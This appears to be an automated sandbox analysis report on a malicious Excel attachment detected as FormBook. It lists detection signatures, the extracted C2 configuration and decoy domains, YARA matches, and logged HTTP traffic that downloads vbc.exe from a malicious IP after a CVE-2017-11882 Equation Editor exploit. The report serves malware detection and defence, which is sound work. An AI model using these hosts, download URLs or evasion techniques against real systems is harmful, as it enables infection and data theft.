Windows Analysis Report
Vecchio debito_SKTGH_465585484754.xlsx

Overview

General Information

Sample Name: Vecchio debito_SKTGH_465585484754.xlsx
Analysis ID: 562488
MD5: 3ecca47c8fd3d3fe23e3de46298b346c
SHA1: 0bed1382da7ffeaf9aa0aa28e9143cffc0ec606d
SHA256: 6f401d7546fc2bd85b659a1d30a89bf21451e327e2712ab86f1a3dec421b7e64
Tags: FormbookVelvetSweatshopxlsx
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
.NET source code contains method to dynamically call methods (often used by packers)
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection
barindex
Found malware configuration
Source: 00000005.00000002.511693460.00000000001C0000.00000040.10000000.00040000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.drmichaelirvine.com/yrcy/"], "decoy": ["ordermws-brands.com", "jkbswj.com", "dairatwsl.com", "lewismiddleton.com", "hevenorfeed.com", "kovogueshop.com", "cyberitconsultingz.com", "besrbee.com", "workerscompfl1.com", "wayfinderacu.com", "smplkindness.com", "servicesitcy.com", "babyvv.com", "fly-crypto.com", "chahuima.com", "trist-n.tech", "minjia56.com", "oded.top", "mes-dents-blanches.com", "nethunsleather.com", "onlinesindh.com", "genrage.com", "bhalawat.com", "5gwirelesszone.com", "semejnyjochag.com", "shopvintageallure.com", "laqueenbeautybar.supplies", "hominyprintingmuseum.com", "taksimbet13.com", "fairytalesinc.com", "loversscout.com", "nxn-n.com", "lovebydarius.store", "mintnft.tours", "snowjamproductiosmedia.com", "boraviajar.website", "cryptointelcenter.com", "m2momshealth.com", "perfectionbyinjection.com", "cletechsolutions.com", "skin4trade.com", "a9d7c19f0282.com", "waltersswholesale.com", "lendsoar.com", "virginialandsforsale.com", "shinepatio.com", "nba2klocker.team", "picturebookoriginals.com", "chatteusa.com", "bodevolidu.quest", "certidaoja.com", "scgxjp.com", "cbd-cannabis-store.com", "kadinisigi.com", "vacoveco.com", "hostedexchangemaintainces.com", "hf59184.com", "jingguanfm.com", "browsealto.com", "kymyra.com", "xrgoods.com", "dtsddcpj.com", "uptimisedmc.com", "redsigndesign.com"]}
Multi AV Scanner detection for submitted file
Source: Vecchio debito_SKTGH_465585484754.xlsx Virustotal: Detection: 39% Perma Link
Source: Vecchio debito_SKTGH_465585484754.xlsx ReversingLabs: Detection: 32%
Yara detected FormBook
Source: Yara match File source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.360cad0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.511693460.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.668980858.0000000000070000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.669019561.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.511806943.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.503199195.00000000097CB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.496910785.00000000097CB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.470929460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.477062967.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.669067975.00000000001D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.511894951.00000000005B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.479122518.00000000034C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://103.167.92.57/CRC/vbc.exe Avira URL Cloud: Label: malware
Source: www.drmichaelirvine.com/yrcy/ Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: dairatwsl.com Virustotal: Detection: 7% Perma Link
Machine Learning detection for dropped file
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 5.0.vbc.exe.400000.5.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.vbc.exe.400000.9.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.2.vbc.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.vbc.exe.400000.7.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Exploits
barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000005.00000002.511976922.0000000000790000.00000040.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000003.477475563.00000000004A0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.514399498.0000000000910000.00000040.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000003.478435499.0000000000600000.00000004.00000800.00020000.00000000.sdmp, cscript.exe
Source: Binary string: cscript.pdbN source: vbc.exe, 00000005.00000002.511936143.0000000000620000.00000040.10000000.00040000.00000000.sdmp, vbc.exe, 00000005.00000002.511770795.0000000000309000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CharUnicodeIn.pdb source: vbc.exe
Source: Binary string: cscript.pdb source: vbc.exe, 00000005.00000002.511936143.0000000000620000.00000040.10000000.00040000.00000000.sdmp, vbc.exe, 00000005.00000002.511770795.0000000000309000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities
barindex
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: www.hevenorfeed.com
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 103.167.92.57:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 103.167.92.57:80
Source: excel.exe Memory has grown: Private usage: 4MB later: 60MB

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 162.241.244.46 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 206.188.192.2 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 216.177.167.5 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.laqueenbeautybar.supplies
Source: C:\Windows\explorer.exe Domain query: www.dairatwsl.com
Source: C:\Windows\explorer.exe Domain query: www.vacoveco.com
Source: C:\Windows\explorer.exe Domain query: www.hevenorfeed.com
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.drmichaelirvine.com/yrcy/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View ASN Name: DEFENSE-NETUS DEFENSE-NETUS
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /yrcy/?jdfhnl=EvxTDFUPJ2-xUnMP&aN=H+0J8LIoM8xANCuc1KZRmbjixQokhoGpIPkQBETMRHrzrLtxV7SOMJUbaHNEQWxSCcCQ4A== HTTP/1.1Host: www.hevenorfeed.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /yrcy/?aN=e/RF5Wkvcu2kD6Q92hYVOLL0JiY85m+wPQ7mJBVhAbkMJKQBASQfBcFHsaVDtw323W8DmA==&jdfhnl=EvxTDFUPJ2-xUnMP HTTP/1.1Host: www.dairatwsl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /yrcy/?jdfhnl=EvxTDFUPJ2-xUnMP&aN=v3r6hW97z/ZOf9TDdHCkxkGayxrL9igaQBwyCSAaMVPNp+0Lw1V9xr9SflbU5XGqGaZNIw== HTTP/1.1Host: www.laqueenbeautybar.suppliesConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 103.167.92.57 103.167.92.57
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Jan 2022 21:47:30 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Fri, 28 Jan 2022 10:19:01 GMTETag: "c2800-5d6a1c37988f5"Accept-Ranges: bytesContent-Length: 796672Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 9a c1 f3 61 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 1a 0c 00 00 0a 00 00 00 00 00 00 5e 38 0c 00 00 20 00 00 00 40 0c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 0c 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 38 0c 00 4b 00 00 00 00 60 0c 00 b8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0c 00 0c 00 00 00 c1 37 0c 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 64 18 0c 00 00 20 00 00 00 1a 0c 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 73 64 61 74 61 00 00 e8 01 00 00 00 40 0c 00 00 02 00 00 00 1e 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b8 05 00 00 00 60 0c 00 00 06 00 00 00 20 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 0c 00 00 02 00 00 00 26 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /CRC/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.167.92.57Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: unknown TCP traffic detected without corresponding DNS query: 103.167.92.57
Source: explorer.exe, 00000006.00000000.491661834.0000000002AE0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: vbc.exe, 00000004.00000002.478639061.00000000024C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://blog.iandreev.com
Source: vbc.exe, 00000004.00000002.478639061.00000000024C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://blog.iandreev.com/
Source: explorer.exe, 00000006.00000000.491661834.0000000002AE0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000006.00000000.491661834.0000000002AE0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000006.00000000.479969960.0000000000255000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000006.00000000.491850597.0000000002CC7000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000006.00000000.491850597.0000000002CC7000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000006.00000000.555506199.0000000001BE0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000006.00000000.499381564.0000000003E50000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000006.00000000.491850597.0000000002CC7000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000006.00000000.491850597.0000000002CC7000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000006.00000000.555506199.0000000001BE0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000000.479969960.0000000000255000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 00000006.00000000.491661834.0000000002AE0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000006.00000000.491850597.0000000002CC7000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000006.00000000.491661834.0000000002AE0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000006.00000000.501167132.000000000447A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.560110260.00000000083F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.484447982.000000000447A000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000006.00000000.501167132.000000000447A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.560110260.00000000083F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.484447982.000000000447A000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000006.00000000.491661834.0000000002AE0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000006.00000000.479969960.0000000000255000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 00000006.00000000.479969960.0000000000255000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000006.00000000.479969960.0000000000255000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E50395A7.emf Jump to behavior
Source: unknown DNS traffic detected: queries for: www.hevenorfeed.com
Source: global traffic HTTP traffic detected: GET /CRC/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.167.92.57Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /yrcy/?jdfhnl=EvxTDFUPJ2-xUnMP&aN=H+0J8LIoM8xANCuc1KZRmbjixQokhoGpIPkQBETMRHrzrLtxV7SOMJUbaHNEQWxSCcCQ4A== HTTP/1.1Host: www.hevenorfeed.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /yrcy/?aN=e/RF5Wkvcu2kD6Q92hYVOLL0JiY85m+wPQ7mJBVhAbkMJKQBASQfBcFHsaVDtw323W8DmA==&jdfhnl=EvxTDFUPJ2-xUnMP HTTP/1.1Host: www.dairatwsl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /yrcy/?jdfhnl=EvxTDFUPJ2-xUnMP&aN=v3r6hW97z/ZOf9TDdHCkxkGayxrL9igaQBwyCSAaMVPNp+0Lw1V9xr9SflbU5XGqGaZNIw== HTTP/1.1Host: www.laqueenbeautybar.suppliesConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.360cad0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.511693460.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.668980858.0000000000070000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.669019561.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.511806943.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.503199195.00000000097CB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.496910785.00000000097CB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.470929460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.477062967.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.669067975.00000000001D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.511894951.00000000005B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.479122518.00000000034C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.2564dd8.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.2505e58.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
Source: 4.2.vbc.exe.360cad0.5.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.vbc.exe.360cad0.5.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.511693460.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.511693460.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
